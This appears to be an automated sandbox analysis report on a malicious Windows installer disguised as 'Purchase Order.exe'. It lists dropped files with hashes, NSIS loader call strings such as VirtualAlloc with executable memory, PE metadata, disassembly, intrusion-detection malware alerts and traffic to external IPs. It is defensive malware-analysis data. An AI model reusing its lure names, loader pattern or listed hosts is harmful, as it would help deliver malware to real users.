                                                                                                SSDEEP:768:kn4C0nabowYKKucVjMHtvH3Eq1Zg5c+0o4u1uLlOxRuYP9aVsVL/e3ec6Axhe7rO:zAzhHNuZla85OxXCm
                                                                                                MD5:FB3375E7CB0698DF507062161A26885F
                                                                                                SHA1:5E98C5E6F50A1B57B1E72B412D9632603FF954EF
                                                                                                SHA-256:EB781B87F06CBBB43E36413F70A97528DFF827A3DA9575E56142324F9CF43477
                                                                                                SHA-512:949FB9F863EB2EC85B84C4DB3E4EA023F1C3FC09CB79FE52B58569C616FC28F2E0D095DB535C3B80EF44CE4F75EA4752313F4F20A3E3A61E49163FCE8078B79B
                                                                                                Malicious:false
                                                                                                Preview:.....O..............c...>........................q....................r...................W............................................................................................................up........................r.................".............................................~...........9...............+.....................................................................................W...............Y..............................................k.....J................... ................................................R..................................................................................5...............T.........................................O..........^........x...........W.......Q......................:......H............+.................................................................6.................................7............w..........s......$...........9..................................................................*........................
                                                                                                Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2649548
                                                                                                Entropy (8bit):2.8014671637869224
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:2xtx+CW5C/76F2Eb7ZaI1NPH0H4It741MEbYs6gvBse+tJ:2xDT69FMIrHo4IeYSBse+7
                                                                                                MD5:6A268A806CA217271D9D5845A9BCD10A
                                                                                                SHA1:F2C419B37BE6ADEDAA5917894CA3165AA1044DFE
                                                                                                SHA-256:50A230D109ABFE5F623C9526A470179E24D1B1AB1F27A5AB8CCA2FFDCDC2E506
                                                                                                SHA-512:31CD499B15E5ECB4B5B95F52BE96764076F3A2A1BFE7BB78363BC2E056A33B6BECF366E475F37546BA27F039421227698F78D6556160219305164CE7199A2576
                                                                                                Malicious:false
                                                                                                Preview:.@......,........................0.......?.......@..........................]...{...........................................................................................................................................................................................................J...N...............j...............................................................................................................................g...........................................................................L...".......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):11264
                                                                                                Entropy (8bit):5.7711167426271945
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                                                                MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                                                                SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                                                                SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                                                                SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: Documenti di spedizione.bat.exe, Detection: malicious, Browse
                                                                                                • Filename: DHL AWB - COMMERCIAL INVOICE AND BL.exe, Detection: malicious, Browse
                                                                                                • Filename: Shipping Documents.bat.exe, Detection: malicious, Browse
                                                                                                • Filename: Oogoninia.exe, Detection: malicious, Browse
                                                                                                • Filename: Oogoninia.exe, Detection: malicious, Browse
                                                                                                • Filename: rStopfodringer.exe, Detection: malicious, Browse
                                                                                                • Filename: rStopfodringer.exe, Detection: malicious, Browse
                                                                                                • Filename: Transferencia 10-7-2024.exe, Detection: malicious, Browse
                                                                                                • Filename: Transferencia 10-7-2024.exe, Detection: malicious, Browse
                                                                                                • Filename: PEDIDO-144848.exe, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):74
                                                                                                Entropy (8bit):3.9637832956585757
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                                                MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                                                SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                                                SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                                                SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                                                Malicious:false
                                                                                                Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                                                Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):52
                                                                                                Entropy (8bit):4.0914493934217315
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                                                MD5:5D04A35D3950677049C7A0CF17E37125
                                                                                                SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                                                SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                                                SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                                                Malicious:false
                                                                                                Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                                                Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):56
                                                                                                Entropy (8bit):4.24214984251469
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:sAAEVvjsQmBo84n:fLUU
                                                                                                MD5:02EE9971E70E48348FBAFC2C78B61E77
                                                                                                SHA1:685B48797F7DB9988E407EA288DA8D7881E17D53
                                                                                                SHA-256:495462FD8490DA33EC8EEE469750DCB808FA1D3782AE14255F2490CAE0398F0B
                                                                                                SHA-512:97DFD8F8F46229F004E6D1753CA163C7C59ADD90E65401BD9D63CF367501C758C7374CADF5BA52866E29C5EC1261A7DC46FBFEA69370086CB6C6E6C3562EDECF
                                                                                                Malicious:false
                                                                                                Preview:kernel32::ReadFile(i r5, i r1, i 78139392,*i 0, i 0)i.r3
                                                                                                Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):30
                                                                                                Entropy (8bit):4.256564762130954
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                                                MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                                                SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                                                SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                                                SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                                                Malicious:false
                                                                                                Preview:user32::EnumWindows(i r1 ,i 0)
                                                                                                Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.50221267998362
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:sEMBQEJkJVEjZPmLXxQoXUn:dzxvUn
                                                                                                MD5:6FE7D11831BB6DE92B94F92FA19D8465
                                                                                                SHA1:05969C732BF0D36D6A2083C6F255361A9B91FE1E
                                                                                                SHA-256:3533514A9F566B703CB08A30BA522FB2791FC955D4D312C2270D1E7F84E06A7C
                                                                                                SHA-512:BB59C7A84E25011D30ADBBD372E4CA654A3BA30C7873178ACA486F048CF440FC652469D5E24614DB16D1DED2A61F41BC4312558EC569F9E64581045D37B1563A
                                                                                                Malicious:false
                                                                                                Preview:kernel32::VirtualAlloc(i 0,i 78139392, i 0x3000, i 0x40)p.r1
                                                                                                Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):1338
                                                                                                Entropy (8bit):3.1388229664318277
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8JvaRkD4/BPefDbDLqizZYpbDtPizZeixGY5HALqy:8oRkDsxy/DLqiNwDtiNlxG+AOy
                                                                                                MD5:01A22D5172D526972C7FE6B2C0D14AF3
                                                                                                SHA1:E4A5912ACC75558EC498FEF7B78806E23067B756
                                                                                                SHA-256:6EE179E2F021482E6AB5D321D5F49D4BBDAD2955B07CE8776A47435C7DAC0C91
                                                                                                SHA-512:27ADF029B5A1672C12BB72B084B634C45FE9C68FC5784F50CFD83D6123D2B85618EA811EED653A173252CDF140FE29CB8614511B4538C7075F5CE820E89E65CE
                                                                                                Malicious:false
                                                                                                Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........INetCache.D............................................I.N.e.t.C.a.c.h.e.....n.2...........divergentes.pin.P............................................d.i.v.e.r.g.e.n.t.e.s...p.i.n.......;...\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.d.i.v.e.r.g.e.n.t.e.s...p.i.n.Z.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                Entropy (8bit):7.322836080474123
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Purchase Order.exe
                                                                                                File size:1'055'136 bytes
                                                                                                MD5:46ae79c53627f188d4c316adb7635524
                                                                                                SHA1:653fc3ca8b9e79295a59428fe0842ec79060fb75
                                                                                                SHA256:05ca345e803d5783617f8b14194428eb79aa486e0b239ae5656847363729a703
                                                                                                SHA512:f028f09d39606821bec5b6f3a12882f3738a86094b435f7f4d3b1e4415ad5bfefbfa456b9a3bb6b976b7bee26c6363281b2cb7755943d0239ca77f8354f363fb
                                                                                                SSDEEP:24576:/o8RUr/5+1TtuEoIEMMZ3l/j8Sb9uASz343NHmI8QIoG:/h+/0ltw5b84SzgNLM
                                                                                                TLSH:B925F1E1B78047A6F4790932848FC6E112E0ED926F421A53137CF37D2DB32D1565BABA
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...5.MX.................`.........
                                                                                                Icon Hash:2f6b71f16d4c71b3
                                                                                                Entrypoint:0x4032bf
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x584DCA35 [Sun Dec 11 21:50:45 2016 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:4f67aeda01a0484282e8c59006b0b352
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=Eksamensprojekternes, O=Eksamensprojekternes, L=Langley, C=US
                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                Error Number:-2146762487
                                                                                                Not Before, Not After
                                                                                                • 10/12/2023 11:11:56 09/12/2026 11:11:56
                                                                                                Subject Chain
                                                                                                • CN=Eksamensprojekternes, O=Eksamensprojekternes, L=Langley, C=US
                                                                                                Version:3
                                                                                                Thumbprint MD5:B8D8FDCFD12F1EEA3A3E0AEC9165BB12
                                                                                                Thumbprint SHA-1:6E269F34E944E51F28A9E30DFCC4AF2733BDB31A
                                                                                                Thumbprint SHA-256:E4ADEB22ACBA33BAA854C786F54AA4FC7A969D29B36BF2B39B7CC5DBA0DA7DAF
                                                                                                Serial:3DE19142D23AD82B0D16B4C609F2442CCA0A25C9
                                                                                                Instruction
                                                                                                sub esp, 00000184h
                                                                                                push ebx
                                                                                                push esi
                                                                                                push edi
                                                                                                xor ebx, ebx
                                                                                                push 00008001h
                                                                                                mov dword ptr [esp+18h], ebx
                                                                                                mov dword ptr [esp+10h], 00409130h
                                                                                                mov dword ptr [esp+20h], ebx
                                                                                                mov byte ptr [esp+14h], 00000020h
                                                                                                call dword ptr [00407120h]
                                                                                                call dword ptr [004070ACh]
                                                                                                cmp ax, 00000006h
                                                                                                je 00007FA270D88083h
                                                                                                push ebx
                                                                                                call 00007FA270D8B009h
                                                                                                cmp eax, ebx
                                                                                                je 00007FA270D88079h
                                                                                                push 00000C00h
                                                                                                call eax
                                                                                                mov esi, 00407298h
                                                                                                push esi
                                                                                                call 00007FA270D8AF85h
                                                                                                push esi
                                                                                                call dword ptr [004070A8h]
                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                cmp byte ptr [esi], bl
                                                                                                jne 00007FA270D8805Dh
                                                                                                push ebp
                                                                                                push 00000009h
                                                                                                call 00007FA270D8AFDCh
                                                                                                push 00000007h
                                                                                                call 00007FA270D8AFD5h
                                                                                                mov dword ptr [00423724h], eax
                                                                                                call dword ptr [00407044h]
                                                                                                push ebx
                                                                                                call dword ptr [00407288h]
                                                                                                mov dword ptr [004237D8h], eax
                                                                                                push ebx
                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                push 00000160h
                                                                                                push eax
                                                                                                push ebx
                                                                                                push 0041ECF0h
                                                                                                call dword ptr [00407174h]
                                                                                                push 004091ECh
                                                                                                push 00422F20h
                                                                                                call 00007FA270D8ABFFh
                                                                                                call dword ptr [004070A4h]
                                                                                                mov ebp, 00429000h
                                                                                                push eax
                                                                                                push ebp
                                                                                                call 00007FA270D8ABEDh
                                                                                                push ebx
                                                                                                call dword ptr [00407154h]
                                                                                                Programming Language:
                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x42ba0.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1007300x1270
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x5e590x60001892c55874b94ef60ac62cf77f0ecd0eFalse0.6585693359375data6.424194540104456IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x70000x12460x14006389f916226544852e494114faf192adFalse0.4271484375data5.0003960999706765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x90000x1a8180x400f02c8b5709d3fb8c6cc1ab777c138d8fFalse0.6455078125data5.211928615453691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .ndata0x240000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x470000x42ba00x42c00cb7fd179fd9ca3f4757b01d96679c1b0False0.21076559573970038data3.8403807556058642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0x472080x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.20773293487587655
                                                                                                RT_DIALOG0x892300x144dataEnglishUnited States0.5216049382716049
                                                                                                RT_DIALOG0x893780x100dataEnglishUnited States0.5234375
                                                                                                RT_DIALOG0x894780x11cdataEnglishUnited States0.6056338028169014
                                                                                                RT_DIALOG0x895980x60dataEnglishUnited States0.7291666666666666
                                                                                                RT_GROUP_ICON0x895f80x14dataEnglishUnited States1.1
                                                                                                RT_VERSION0x896100x24cdataEnglishUnited States0.5357142857142857
                                                                                                RT_MANIFEST0x898600x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                DLLImport
                                                                                                KERNEL32.dllCopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States
                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-10-21T11:30:30.432233+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.54997584.38.129.1680TCP
                                                                                                2024-10-21T11:30:35.926645+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549976193.122.130.080TCP
                                                                                                2024-10-21T11:30:38.155378+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549976193.122.130.080TCP
                                                                                                2024-10-21T11:30:38.379733+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549976193.122.130.080TCP
                                                                                                2024-10-21T11:30:40.036016+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549976193.122.130.080TCP
                                                                                                2024-10-21T11:30:40.737320+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549978188.114.97.3443TCP
                                                                                                2024-10-21T11:30:41.457981+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549979193.122.130.080TCP
                                                                                                2024-10-21T11:30:42.155353+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549980188.114.97.3443TCP
                                                                                                2024-10-21T11:30:44.895428+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549981193.122.130.080TCP
                                                                                                2024-10-21T11:30:49.059899+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549985188.114.97.3443TCP
                                                                                                2024-10-21T11:30:52.448245+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549987188.114.97.3443TCP
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 21, 2024 11:30:29.603013039 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:29.608150959 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:29.608251095 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:29.608429909 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:29.613562107 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.432154894 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.432182074 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.432193041 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.432209969 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.432223082 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.432233095 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.432265997 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.547195911 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.547225952 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.547240019 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.547250986 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.547262907 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.547333002 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.547357082 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.547408104 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.547521114 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.549887896 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.549956083 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.549967051 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.549976110 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.550065041 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.550067902 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.550152063 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.660098076 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.660125017 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.660139084 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.660284042 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.663886070 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.663897038 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.663992882 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.664005995 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.664017916 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.664030075 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.664046049 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.664136887 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.666924000 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.666992903 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.667002916 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.667012930 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.667012930 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.667124033 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.667201996 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.667218924 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.667273998 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.777440071 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.777455091 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.777466059 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.777512074 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.777544022 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.781521082 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.781534910 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.781539917 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.781548977 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.781555891 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.781616926 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.784496069 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.784521103 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.784532070 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.784590006 CEST4997580192.168.2.584.38.129.16
                                                                                                Oct 21, 2024 11:30:30.784601927 CEST804997584.38.129.16192.168.2.5
                                                                                                Oct 21, 2024 11:30:30.784614086 CEST804997584.38.129.16192.168.2.5
